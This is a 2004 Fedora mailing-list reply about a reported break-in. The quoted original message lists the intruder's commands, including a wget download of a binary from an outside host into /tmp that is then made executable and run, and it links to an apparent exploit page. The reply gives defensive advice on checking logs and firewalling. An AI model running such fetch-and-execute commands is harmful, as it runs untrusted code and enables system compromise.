Vulnerability on FC3T2 ? Present in FC3 ?
Aaron Scott
scott.aaron at abc.net.au
Mon Nov 22 04:51:52 UTC 2004
And how does this prove that there is a vulnerability in fedora and not
that you have poor securty?
According to the URL's you post some one has installed a root kit.
Unlucky. But they had to get it there first.
You should first discover how they got onto your machine. You will need
to check a lot more logs than just wtemp. Try secure and messages as
well. Maybe some one guessed your password. I really hope that you
have firewalled that ip range out to help prevent further trouble from
that IP range ( assuming though the hacker isn't bouncing from
comprimised machine to comprimised machine ). Also, you might want to
consider who has had or might have had physical access to your machine
( if that is possible ).
Pointing the finger at Fedora with out real proof is pointless.
On Mon, 2004-11-22 at 02:14 +0000, richard mullens wrote:
> Someone logged into my system on 13 Nov 2004
> I found the following in /var/log/wtmp
>
> 207-36-180-20.prt.primarydns.com
> demo.allegientsystems.com
>
> My user password was changed - but not the root password - and the
> following commands had been executed:-
>
> w
> uname -a
> cat /etc/issue
> cd /tmp
> wget chebeleu.com/local
> chmod +x local
> ./local -d -r
> ./local -d -r
> lunx
> lynx
>
> There is a similar report dated 10-Nov-2004 at
> http://episteme.arstechnica.com/eve/ubb.x?a=tpc&s=50009562&f=96509133&m=531005547631
> where someone suggested it might be the exploit at
> http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php
>
> Anybody know any more ?
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.fedoraproject.org/pipermail/test/attachments/20041122/eb6e9ef8/attachment.html
More information about the test
mailing list